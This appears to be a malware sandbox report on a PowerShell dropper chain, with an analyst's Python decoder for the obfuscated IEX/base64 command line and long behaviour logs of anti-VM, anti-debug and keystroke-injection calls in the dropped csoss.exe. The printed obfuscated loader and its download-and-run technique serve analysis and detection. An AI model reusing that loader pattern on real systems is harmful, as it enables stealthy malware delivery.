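# The command line itself, as recorded for the cmd.exe -> powershell.exe step.
CMDLINE = (
    "POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; "
    "IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'"
    "+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'" + B64_ARG + "'+[char]34+'))')))"
)

# Either a single-quoted literal or a [char]N cast (decimal or 0x-hex), any case.
_PIECE = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)


def fold_concat(expr):
    """Evaluate a PowerShell '...'+[char]N+'...' chain into the string it builds."""
    parts = []
    for literal, num in _PIECE.findall(expr):
        if num:
            parts.append(chr(int(num, 16) if num[:2].lower() == "0x" else int(num)))
        else:
            parts.append(literal)
    return "".join(parts)


_B64_CALL = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=\s]+?)"\s*\)', re.IGNORECASE)


def decode_payload(stage1):
    """Pull the argument out of FromBase64String("...") and decode it as UTF-8."""
    m = _B64_CALL.search(stage1)
    if not m:
        raise ValueError("no FromBase64String(...) call found")
    blob = re.sub(r"\s+", "", m.group(1))
    blob += "=" * (-len(blob) % 4)  # re-pad in case a log pipeline trimmed the trailing '='
    return base64.b64decode(blob).decode("utf-8")


CMDLETS = ("Add-Type", "Start-Sleep", "Invoke-Item", "Invoke-Expression")


def normalize(script):
    """Collapse the whitespace padding and restore canonical cmdlet casing."""
    text = re.sub(r"\s+", " ", script).strip()
    for name in CMDLETS:
        text = re.sub(re.escape(name), name, text, flags=re.IGNORECASE)
    return text


def extract_iocs(script):
    text = normalize(script)
    return {
        "urls": re.findall(r"https?://[^\s\"')]+", text),
        "paths": sorted({p.lower() for p in re.findall(r"\$env:\w+\\[^\s\"')]+", text, re.IGNORECASE)}),
        "apis": sorted({a.lower() for a in re.findall(
            r"\b(?:URLDownloadToFile|Add-Type|Start-Sleep|Invoke-Item)\b", text, re.IGNORECASE)}),
    }


def analyse(cmdline):
    stage1 = fold_concat(cmdline)          # what the outer IEX actually receives
    payload = decode_payload(stage1)       # what the inner IEX then runs
    return {"stage1": stage1, "payload": normalize(payload), "iocs": extract_iocs(payload)}


if __name__ == "__main__":
    result = analyse(CMDLINE)
    print(result["payload"])
    print(result["iocs"])
```

The decoded script declares `URLDownloadToFile` from urlmon.dll through `Add-Type -MemberDefinition`, which is why no `Invoke-WebRequest` or `DownloadString` shows up anywhere in the command line; it then sleeps three seconds and runs `$env:APPDATA\csoss.exe`. That matches the `File created (dropped file)` entries for csoss.exe and csoss[1].exe above, and the urlmon.dll and wininet.dll section loads listed for powershell.exe earlier are the side effect of that P/Invoke. When writing detections from this, match on `Add-Type` plus `DllImport` and on `[char]` arithmetic rather than on cmdlet names, which the author never spells consistently.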

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 6_2_001B48D7
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00235376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 6_2_00235376
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_001D3187
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\csoss.exe API/Special instruction interceptor: Address: 17332BC
                    Source: csoss.exe, 00000006.00000002.1393664789.00000000017F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 7370
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7522
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_6-102278
                    Source: C:\Users\user\AppData\Roaming\csoss.exe API coverage: 4.4 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 7728 Thread sleep count: 7370 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024 Thread sleep count: 7522 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036 Thread sleep count: 2062 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5352 Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0021445A
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021C6D1 FindFirstFileW,FindClose,6_2_0021C6D1
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0021C75C
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0021EF95
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0021F0F2
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0021F3F3
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_002137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_002137EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00213B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00213B12
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_0021BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0021BCBC
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_001B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001B49A0
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: csoss.exe, 00000006.00000003.1376646997.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1376729063.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1376646997.0000000001889000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.6.dr Binary or memory string: WR_HGfSGVWXMWGD3
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: RegSvcs.exe, 00000007.00000002.2505048024.0000000000776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                    Source: powershell.exe, 00000003.00000002.1400465631.000000000839E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxM:
                    Source: csoss.exe, 00000006.00000002.1393664789.00000000017F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0470C168
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00223F09 BlockInput,6_2_00223F09
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_001B3B3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_001E5A7C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B4B37 LoadLibraryA,GetProcAddress,6_2_001B4B37
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_01733528 mov eax, dword ptr fs:[00000030h]6_2_01733528
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_01733588 mov eax, dword ptr fs:[00000030h]6_2_01733588
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_01731EC8 mov eax, dword ptr fs:[00000030h]6_2_01731EC8
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_002080A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DA124 SetUnhandledExceptionFilter,6_2_001DA124
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_001DA155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: amsi32_7560.amsi.csv, type: OTHER
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
